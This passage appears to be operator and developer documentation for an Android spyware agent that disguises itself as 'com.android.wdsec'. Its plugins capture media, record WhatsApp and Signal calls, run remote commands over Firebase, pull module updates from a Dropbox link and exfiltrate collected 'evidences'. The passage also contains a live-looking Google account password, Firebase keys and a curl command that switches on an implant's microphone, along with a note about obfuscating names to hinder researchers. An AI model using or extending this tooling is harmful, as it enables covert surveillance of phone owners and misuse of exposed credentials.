            "available_bytes_internal": 50687909888,
            "available_bytes_external": 50666938368,
            "external_emulated": true
          },
   		"agent_info": {
          	"build": "dummy_agent_buildversion",
            	"pkgname": "com.android.wdsec",
  			"evidence_folder_size": 41344,
              "plugins": [
              	{
                		"modcalendar": {
                  		"pkgname": "com.android.wdsec.modcalendar",
                  		"build": "dummy_plugin_buildversion",
                          "status": "idle"
                		}
              	},
              	{
                		"modcalllog": {
                  		"pkgname": "com.android.wdsec.modcalllog",
                  		"build": "dummy_plugin_buildversion",
                          "status": "running"
                		}
              	}
              ]
          },
          "cellular": {
            "phone_type": "gsm",
            "subscriber_id": "222015604673716",
            "simcards": [
              {
                "carrier": "I TIM",
                "mcc": 222,
                "mnc": 1,
                "name": "CARD 1",
                "iccid": "89390100002306757059",
                "countrycode": "it",
                "slot": 0,
                "imei": "353759097151041"
              }
            ],
            "cells": [
              {
                "registered": true,
                "type": "gsm",
                "cid": 29943,
                "lac": 44858,
                "dbm": -51,
                "asu_level": 31,
                "level": 4
              },
              {
                "type": "gsm",
                "cid": 5987,
                "lac": 0,
                "dbm": -51,
                "asu_level": 31,
                "level": 4
              },
              {
                "type": "gsm",
                "cid": 29718,
                "lac": 0,
                "dbm": -51,
                "asu_level": 31,
                "level": 4
              },
              {
                "type": "gsm",
                "cid": 48662,
                "lac": 0,
                "dbm": -51,
                "asu_level": 31,
                "level": 4
              }
            ]
          },
          "connections": [
            {
              "connected": false,
              "downlink_kbps": 1048576,
              "uplink_kbps": 1048576,
              "capabilities": "[NOT_RESTRICTED][NOT_VPN][WIFI_P2P][TRUSTED]"
            },
            {
              "connected": true,
              "extrainfo": "\"cristonet-5g\"",
              "downlink_kbps": 1048576,
              "uplink_kbps": 1048576,
              "capabilities": "[INTERNET][NOT_METERED][NOT_RESTRICTED][NOT_ROAMING][NOT_VPN][VALIDATED][TRUSTED]",
              "iface": "wlan0",
              "macaddress": "04:d6:aa:80:16:79",
              "dns": [
                "\/192.168.178.1"
              ],
              "ip": [
                "fe80::6d6:aaff:fe80:1679\/64",
                "192.168.178.41\/24"
              ]
            }
          ],
          "wifi": {
            "known_wifi": [
              {
                "ssid": "\"cristonet-5g\"",
                "hidden": false,
                "security": "wpa2-psk",
                "connected": true,
                "speed_mbps": 702,
                "dbm_rssi": -49,
                "frequency_mhz": 5180
              }
            ],
            "last_scan_wifi": [
              {
                "bssid": "c8:0e:14:25:31:c6",
                "ssid": "cristonet",
                "lastseen_microsec": 1503827745068,
                "frequency": 2462,
                "dbm_rssi": -40,
                "capabilities": "[WPA2-PSK-CCMP][ESS][WPS]"
              },
              {
                "bssid": "fa:8f:ca:6b:12:19",
                "lastseen_microsec": 1503827745076,
                "frequency": 2462,
                "dbm_rssi": -44,
                "capabilities": "[ESS]"
              },
              {
                "bssid": "00:17:13:23:fa:84",
                "ssid": "cristonet_84",
                "lastseen_microsec": 1503827745083,
                "frequency": 2462,
                "dbm_rssi": -44,
                "capabilities": "[WPA2-PSK-CCMP][ESS]"
              },
              {
                "bssid": "c8:0e:14:25:31:c7",
                "ssid": "cristonet-5g",
                "lastseen_microsec": 1503827745024,
                "frequency": 5180,
                "dbm_rssi": -50,
                "capabilities": "[WPA2-PSK-CCMP][ESS][WPS]"
              },
              {
                "bssid": "fa:8f:ca:81:b4:a4",
                "lastseen_microsec": 1503827745091,
                "frequency": 2462,
                "dbm_rssi": -76,
                "capabilities": "[ESS]"
              },
              {
                "bssid": "e8:df:70:00:63:28",
                "ssid": "cristonet-g",
                "lastseen_microsec": 1503827745057,
                "frequency": 2412,
                "dbm_rssi": -83,
                "capabilities": "[WPA2-PSK-CCMP][ESS][WPS]"
              },
              {
                "bssid": "5c:49:79:3a:d8:38",
                "ssid": "cristonet-mansarda",
                "lastseen_microsec": 1503827745046,
                "frequency": 2412,
                "dbm_rssi": -84,
                "capabilities": "[WPA2-PSK-CCMP][ESS][WPS]"
              }
            ]
          },
        	"apps": [
            {
              "pkg_name": "com.google.android.youtube",
              "label": "YouTube",
              "install_time": 1230735600000,
              "update_time": 1543976884075
            },
            {
              "pkg_name": "stericson.busybox",
              "label": "BusyBox Free",
              "install_time": 1538491683320,
              "update_time": 1542724136932
            },
            {
              "pkg_name": "com.google.android.googlequicksearchbox",
              "label": "Google",
              "install_time": 1230735600000,
              "update_time": 1543890392987
            },
            {
              "pkg_name": "com.samsung.android.calendar",
              "label": "Calendario",
              "install_time": 1230735600000,
              "update_time": 1543960262719
            },
            ...
          ]
        }
   }            
~~~

##### modmedia

captures storage media (photos, videos, audio, files), both on-the-fly and on-demand.

__WARNING: using this plugin in the wrong way (i.e. requesting all storage images with an unfiltered command) may lead to high bandwith and device space usage!__

_It's advised to make subsequent targeted requests making use of both make_thumbnails (to have a preview) or max_results._

* type: __both__

The plugin works as normal in __on-demand__ mode by capturing the requested media type through the __start__ command.

As a plus, it has a node in the __global configuration__ where the automatic mode can be enabled by setting __allow_auto__.

If it is set, the plugin starts on device boot and captures media files on the fly (i.e. pictures when taken with camera, files received/downloaded, ...).

###### global configuration

the __global configuration__ may have an entry for this plugin.

~~~js
 "modmedia": {
     // allows capturing media on the fly
     "allow_auto": true,
     // if true, evidence 'media_thumbnail' is generated instead of 'media' for image and video media 
     "make_thumbnails": true,
     // allows capturing storage pictures on the fly
     "onthefly_include_image": true,
     // allows capturing storage video on the fly
     "onthefly_include_video": true,
     // allows capturing audio files on the fly
      "onthefly_include_audio": false,
     // allows capturing downloaded files on the fly
     "onthefly_include_file": true
    }
~~~

###### commands

* start    

~~~js
  {
      "type":"remotecmd",
      "cmdid": 12345678,
      "body":{
          "target": "modmedia",
          "name": "start",
         	// if specified, limit result to these much items (an additional cmdresult evidence will be sent with number of requested vs available items)
       	"max_result": 2,
          // if true, evidence 'media_thumbnail' is generated instead of 'media' for image and video media 
       	"make_thumbnails": true,
          // name of the folder to retrieve the media from, when requested media type is file (filter->type->value=0).
          // if not specified, it's "Download" folder
          // if it's "*", all folders indexed by the media manager are scanned.
          "folder": "Download",
          "filter": {
  			// this is a filter to control the returned values (refer to the "notes on filters" paragraph above)
  			// following is the list of supported entries, match_type and value_type for this specific filter
  			"datetime": {
  				// media date, unix epoch SECONDS datetime
  				"value": 1542884573,
  				//  0|2|3|4 (exact/>=/<=/ignore)
  				"match_type": 2,
  				// 1: number
  				"value_type": 1
  			},
  			"datetime_end": {
  				// this is intended as the end of an interval (all entries between datetime and datetime_end)
  				"value": 1542884973,
  				//  3|4 (<=/ignore)
  				"match_type": 3,
  				// 1: number
  				"value_type": 1
  			},
  			"type": {
  				// the media type to retrieve (0=file, 1=image, 2=audio, 3=video, default is 1=image)
  				"value": 1,
  				// 0 (exact)
  				"match_type": 0,
  				// 1: number
  				"value_type": 1
  			}
          }
      }
  }
~~~

* enable
* stop

###### evidences

* media

__NOTE__: evidences of this kind are captured in 1MB chunks, since they're possibly big files !!!

~~~js
  {
        "type": "media",
        "timestamp": 1544483413262,
        "context": 1729704767092757308,
        "body": {
          // last chunk have this flag set
          "last": true,
          // this is the whole file hash
          "file_sha1": "00916f9b546be7834d083c64a2a529a274a94233ff",
          // original path on the storage
          "path": "\/storage\/emulated\/0\/DCIM\/Camera\/20181211_001008.jpg",
          // (0=file, 1=image, 2=audio, 3=video)
          "type": 1,
          // unix epoch SECONDS datetime when the file has been added to the device media store
          "datetime_added": 1544483408,
          // this chunk number, 0 based
          "chunk": 2,
          // this chunk (b64 decoded) size
          "chunksize": 37086,
          // full file size
          "file_size": 2085086,
          // base-64 encoded chunk content
          "b64": "..."
        }
  }
~~~

* media_thumbnail

generated instead of _media_ when __make_thumbnails__ is set. 

It retains all the original media properties (_file_sha1, file_size, datetime_added_), except this is not chunked content and there's _thumbnail_ directly. 

~~~js
  {
        "type": "media_thumbnail",
        "timestamp": 1544483413262,
        "context": 1729704767092757308,
        "body": {
          // this is the whole file hash
          "file_sha1": "00916f9b546be7834d083c64a2a529a274a94233ff",
          // original path on the storage
          "path": "\/storage\/emulated\/0\/DCIM\/Camera\/20181211_001008.jpg",
          // (0=file, 1=image, 2=audio, 3=video)
          "type": 1,
          // unix epoch SECONDS datetime when the file has been added to the device media store
          "datetime_added": 1544483408,
          // full file size
          "file_size": 2085086,
          // base-64 encoded thumbnail
          "b64": "..."
        }
  } 
~~~

##### modupdate

allows the agent to be updated remotely with new/updated modules.

also supports the full APK update, *though it will prompt the user*.

* type: __on-demand__

###### commands

* start

~~~js
  {
      "type":"remotecmd",
      "cmdid": 12345678,
      "body":{
          "target": "modupdate",   
          "name": "start",
          // download url (firebase do not support messages more than a bunch of kb) NOTE: the file MUST BE ENCRYPTED/COMPRESSED using the device key returned in the 'device_id' evidence, and the 16 bytes iv prepended to buffer!          
          "url": "https://dl.dropboxusercontent.com/s/mm0drfve3ipimym/crypted.apk?dl=0",
          
          // internal name (returned by IPlugin.name()) of the module to be updated. if this value is "*", the downloaded file represents the whole agent APK which will be updated (though, it will ask the user for confirmation). in such case, beware the package name MUST be the same as the one used on the first installation, or the updated will fail!
          "module": "modmic"
      }
  }
~~~

##### modvoip

captures voip audio, application independent.

* type: __automatic__, triggered by incoming/outgoing calls.

###### limitations

* __dependent on merged app/exploit or rooted/pre-rooted device!__
  * __needs root confirmation/notifies from magisk/supersu/... disable them manually, will be addressed shortly!__

###### global configuration

the __global configuration__ shall have an entry for this plugin.

~~~js
"modvoip": {
    // this must be set to true!
    "allow_auto": true,
    // the chunk size in seconds, minimum is 15
    "chunksize": 15,
    // list of voip applications to be hooked, comma separated
    // NOTE: the capture routine is GENERIC, so it will work with __EVERY__ listed here (except permission issues bugs...)
    // in this example, only whatsapp and signal are captured.
    "processes": "com.whatsapp,org.thoughtcrime.securesms",
    // screenshot at call start
    "screenshot_on_start": false,
    // app definitions to capture the call information (refer to the specific documentation in DBPARSER.md)
    "apps": {
        "com.whatsapp": {
          "query": "SELECT call_log.from_me, jid.user, call_log.duration, call_log.timestamp FROM call_log,jid WHERE (jid._id == call_log.jid_row_id) ORDER BY call_log.timestamp DESC LIMIT 1",
          "db": [
            "/data/data/com.whatsapp/databases/msgstore.db"
          ],
          "evd": "call_info",
          "mapping": {
            "from_me": {
              "dest": [
                {
                  "dest": "direction",
                  "dest_type": "int",
                  "dest_value": {
                    "1": 2,
                    "0": 1
                  }
                }
              ]
            },
            "user": {
              "dest": [
                {
                  "dest": "phonenumber",
                  "dest_search_phonebook": "contact"
                }
              ]
            },
            "timestamp": {
              "dest": [
                {
                  "dest": "start_timestamp",
                  "dest_type": "long"
                }
              ]
            },
            "duration": {
              "dest": [
                {
                  "dest": "duration",
                  "dest_type": "int"
                }
              ]
            }
          }
        },
        ...
     }     
}
~~~

###### commands

* enable
* stop

###### evidences

* voip_audio
  
~~~js
  {
      "type":"voip_audio",
      "timestamp":1542884753570,
      "cmdid": 12345678,
      "context": 12345678,
      "body":  {
   		// offset in seconds for this chunk in chunksize-seconds steps (assuming a chunksize of 30 seconds, first is 0, 2nd is 30, 3rd is 60, ...)
          "offset_seconds": 0,

          // 0-based chunk index
          "chunk": 0,

          // the encoded audio payload(OGG/Speex) for this chunk
          "b64": "base64 encoded blob",

          // if present, indicates this is the last chunk of the recording
          "last": false,

          // source for this chunk, microphone or speaker
          "source": "mic",

          // call start timestamp (start of chunk 0) in unix epoch MILLISECONDS
          "start_timestamp": 12345678,
          
          // originating process
          "process": "com.whatsapp",
        
          // call information (best effort, some data may be not available)
          "call_info": {
            // call direction, 1=incoming, 2=outgoing
            "direction": 1,
    
            // call start timestamp, unix epoch MILLISECONDS
            "start_timestamp":1542884753570,
    
            // the phone number (caller in case of incoming, called in case of outgoing)
            "phonenumber": 12345678,
    
            // the contact from the phonebook, if it's available        
            "contact": "TheContactName"          
          }
      }
  }
~~~

* voip_screenshot
  
a screenshot, optionally, may be captured at the start of the call.

~~~js
  {
      "type":"voip_screenshot",
      "timestamp":1542884753570,
      "cmdid": 12345678,
    
      // this context matches the context of the chunks of the voip call evidence
      "context": 12345678,
      "body":{
          // the encoded PNG payload
          "b64": "base64 encoded blob",

          // originating process
          "process": "com.whatsapp"

          // call start timestamp (start of chunk 0) in unix epoch MILLISECONDS
          "start_timestamp": 12345678
      }
  }
~~~

#### special plugins

these plugins allows the agent to __receive commands, collect and exfiltrate evidences__. 

They can be plugged in the agent interchangeably, just only one __collector__ plugin is allowed (there may be more than one __exfiltrator__ or __commands receiver __ plugins, though, even if it's not advised to).

all these plugins do not respond to commands __start/stop/enable__, they handle them internally!

##### modfirebasecmd

allows the agent to receive the commands through __firebase__.

* type: __automatic/commands receiver__

###### global configuration

the __global configuration__ must have an entry for this plugin, with the necessary keys to connect to firebase.

a default is set with the vanilla-built package, then the firebase __google_services.json__ is parsed and embedded at build time by the backend __build_agent.py__ script.

~~~js
    "modcmdfirebase": {
      "api_key": "AIzaSyCvh_xcY8Jm-kJEYMhK_BRw6AbPHGzcUiU",
      "database_url": "https://testagt-9cee3.firebaseio.com",
      "application_id": "1:389751116098:android:3f158286c587176f",
      "project_id": "testagt-9cee3",
      "storage_bucket": "testagt-9cee3.appspot.com",
      "pkg": "com.android.wdsec",
       // the usynch library configuration
       "usynch": {
            "backdoor_id": "00112233445566778899aabbccdd",
            "aes_key": "00112233445566778899aabbccddeeff",
            "conf_key": "00112233445566778899aabbccddeeff",
            "challenge_key": "00112233445566778899aabbccddeeff",
            "demo_mode": "00112233445566778899aabbccddeeff0011223344556677",
            "root_request": "00112233445566778899aabbccddeeff",
            "random_seed": "00112233445566778899aabbccddeeff",
            "persistence": "00112233445566778899aabbccddeeff",
            "host": "00112233445566778899aabbccddeeff"
       }        
    }
~~~

##### modevidence

allows the agent to collect evidences and talks with one or more __exfiltrator__ plugins to exfiltrate them.

implements a simple 'collect/cache to disk/exfiltrate/delete' algorithm, suitable for mobile device (do not cache multiple evidences in memory)

* type: __automatic/collector__

###### global configuration

the __global configuration__ must have an entry for this plugin.

~~~js
"modevidence": {
    // maximum percent of the (current) free space to be occupied by the agent evidence caches. once reached, the agent stops collecting evidences until the cache is exfiltrated. if not present, the full free space may be utilized by the agent cache
    "max_agent_cache_percent_freespace": 20,
    // the usynch library configuration
    "usynch": {
    	"backdoor_id": "00112233445566778899aabbccdd",
        "aes_key": "00112233445566778899aabbccddeeff",
        "conf_key": "00112233445566778899aabbccddeeff",
        "challenge_key": "00112233445566778899aabbccddeeff",
        "demo_mode": "00112233445566778899aabbccddeeff0011223344556677",
        "root_request": "00112233445566778899aabbccddeeff",
        "random_seed": "00112233445566778899aabbccddeeff",
        "persistence": "00112233445566778899aabbccddeeff",
        "host": "00112233445566778899aabbccddeeff"
    }
}
~~~

##### modexfiltrate

allows the agent to exfiltrate the evidence, implements a variation of the __RCS__ protocol (__microsync__).

* type: __automatic/exfiltrator__

this plugin may download an __emergency configuration__ (a standard __global configuration__ as returned by the __config__ command)

the __emergency configuration__ is immediately applied to all plugins and may _recover_ a stuck agent (i.e. with a different firebase configuration)

###### global configuration

the __global configuration__ must have an entry for this plugin.

~~~js
"modexfiltrate": {
    // if true (and internet connection is not up), flashes a trasparent activity to wakeup the device (shouldn't be needed since the use of WorkManager, anyway it doesn't harm....)
    "wakeup": true,
    // wakeup mode: if 0, the screen is forced on with low luminosity. if 1, sensors are checked to detect proximity and device face-down. if 2 (default) no screen-on is forced and just the transparent activity is flashed.
    "wakeupForceScreenOn": 0,
    // the usynch library configuration
    "usynch": {
    	"backdoor_id": "00112233445566778899aabbccdd",
        "aes_key": "00112233445566778899aabbccddeeff",
        "conf_key": "00112233445566778899aabbccddeeff",
        "challenge_key": "00112233445566778899aabbccddeeff",
        "demo_mode": "00112233445566778899aabbccddeeff0011223344556677",
        "root_request": "00112233445566778899aabbccddeeff",
        "random_seed": "00112233445566778899aabbccddeeff",
        "persistence": "00112233445566778899aabbccddeeff",
        "host": "00112233445566778899aabbccddeeff"
    }
}
~~~

### testing

When developing the application, in case the app/configuration.json or modules are changed, in order to use the new configuration/modules __application uninstall is MANDATORY__*.

Or alternatively it is possible to set to true the __TEST_ALWAYS_EXTRACT_ASSETS static boolean inside _AppClass.java_.

#### cloud setup for testing (google account)

following is a google account and firebase project utilized for testing.

##### firebase project

* user: john.r.fumagalli@gmail.com
* password: 9kXlM6tI
* https://console.firebase.google.com/project/testagt-9cee3/overview
* server key: AAAAWr76EUI:APA91bEy-eLH1VntxJBwlm-Iu-gVAsT-VZHYmxPv36he6G9NPo2W9Q6uGpsAwJDZBK1WfQ5KjDZHqkqTm5urgdrR-nr6M_ihsPcrlC4Pu-JZxoLOY0sFl-W5g1M5gKGlbBu1qmDEKRUk
  * this is the key in the POST 'Authorization'

##### firebase test scripts

use scripts in _firebase_test_scripts_ folder as base for quick testing.

~~~js
// use priority 10 for realtime messages (high priority)
curl https://fcm.googleapis.com/fcm/send -X POST \
--header "Authorization: key=AAAAWr76EUI:APA91bEy-eLH1VntxJBwlm-Iu-gVAsT-VZHYmxPv36he6G9NPo2W9Q6uGpsAwJDZBK1WfQ5KjDZHqkqTm5urgdrR-nr6M_ihsPcrlC4Pu-JZxoLOY0sFl-W5g1M5gKGlbBu1qmDEKRUk" \
--Header "Content-Type: application/json" \
 -d '
{
    // put the agent token id here, it can be found when the firebase plugin initializes in the debug log.
    // beware it changes frequently while running, not only after uninstalls!!!
    //2019-02-01 16:01:12.761 11573-12058/com.valerino.test D/SECDBG: __VERBOSE,TID:503,com.valerino.test.libutils.PluginBase/start,PluginBase.java,115)__ PLUGIN START PARAMS for modcmdfirebase:
    //----
    //{
    //  "token": "cKEpayUuuUo:APA91bHTEO6EXw7t89Fy4sCPY6wHjpf-Ig4odKwKN_HnhObvKC7yKIwJhZCRWCTonXV8suoHT6jF2H629owt98JMgMWDSLMDKbLwR3VPUWhIYo7L3uXM0dHx4Bu6a2dG1YgKuIQrzq1A"
    // }
 	"to": "cKEpayUuuUo:APA91bHTEO6EXw7t89Fy4sCPY6wHjpf-Ig4odKwKN_HnhObvKC7yKIwJhZCRWCTonXV8suoHT6jF2H629owt98JMgMWDSLMDKbLwR3VPUWhIYo7L3uXM0dHx4Bu6a2dG1YgKuIQrzq1A",
 	"data": {
         "data": "{
            \"type\": \"remotecmd\",
 		    \"cmdid\": 12345678,
 		    \"timestamp\": 1542884753570,
 		    \"body\": {
 		        \"target\": \"mic\",
 		        \"name\": \"start\",
 		        \"duetime\": 1542759040
 		    }
 		 }"
 	},
 	"priority": 5
}'
~~~

look at https://firebase.google.com/docs/cloud-messaging/send-message

#### testing with DOZE mode

To test functionality under _deep idle_ state, use the provided _set_doze.sh_ with a device connected through ADB.

It forces the device into the __DOZE DEEP IDLE__ state, so you can test if firebase wakeup works!

~~~bash
valerino@valerino-desktop-linux:~/work/microandroid$ ./set_doze.sh
usage: ./set_doze.sh <on|off|query|reset>

valerino@valerino-desktop-linux:~/work/microandroid$ ./set_doze.sh on
[-] setting doze on
Now forced in to deep idle mode

valerino@valerino-desktop-linux:~/work/microandroid$ ./set_doze.sh query
[-] querying deep-idle(doze) status
IDLE

valerino@valerino-desktop-linux:~/work/microandroid$ ./set_doze.sh off
[-] setting doze off
Light state: ACTIVE, deep state: ACTIVE

valerino@valerino-desktop-linux:~/work/microandroid$ ./set_doze.sh query
[-] querying deep-idle(doze) status
ACTIVE
~~~

#### quick uninstall during testing

assumes package name is _com.android.wdsec_.

* on non-rooted devices:

~~~js
adb uninstall com.android.wdsec
~~~

* on non-rooted devices:

~~~js
// copy this to an executable location on the device, i.e. /data/local/tmp
adb push test_tools/uninstall_root.sh /data/local/tmp

// on the device in a root shell
chmod 755 /data/local/tmp/uninstall_root.sh
/data/local/tmp/uninstall_root.sh
~~~

### TODO

#### all

* rename stuff kept from proguard obfuscation in __microandroid/shared-proguard-rules.pro__ to non descriptive names.....
  * use something like dexprotector ?
  * just to annoy researchers.....

#### backend

* ~~turn the __firebase_test_scripts__ shell scripts into something real on the backend (handle parameters, ...)~~

#### plugins

* implement other stuff accessible without root (email ?)
* genericize code handling database filters (i.e. direct filter subnode name -> column mapping and such), or implement specific query directly via a remote command

### issues

* ~~(*test throughly using the new __ping__ command, which is meant to specifically address the following:*)~~
  * ~~on Android 9 (and possibly 8 too) automatic listeners as in __modcamera__ and __modgps__ working in __automatic__ mode will stop working after a while, due to the app considered as background.~~
  * ~~try simulating clicking on the app at intervals (restarting the app is harmless, it would find itself already running and do nothing) to start the Main Activity, which would grant foreground status for a while again~~
    * ~~this may have issues when the app is hidden through the __hide__ command.~~
  * ~~try using a foreground service (https://developer.android.com/about/versions/oreo/background-location-limits)~~
* *IV should not be 0 when encrypting an evidence for exfiltration* (see __usynch__ source, *Crypto.java*). 
  * Ideally, it should be derived from the *unique device key* together with the AES key (without using the embedded AES key in the *usynch* section of the configuration, which in turns come from the legacy *RCS binary patch*).
    * in this setting, only the first sync to receive the *disposable key* is 'unsafe' (encrypted with the embedded key). 
      * *then, all the communication from and to the agent will be protected by the uniqueness of the device key.*
    * __unfortunately, this require changes to the legacy RCS workings....__
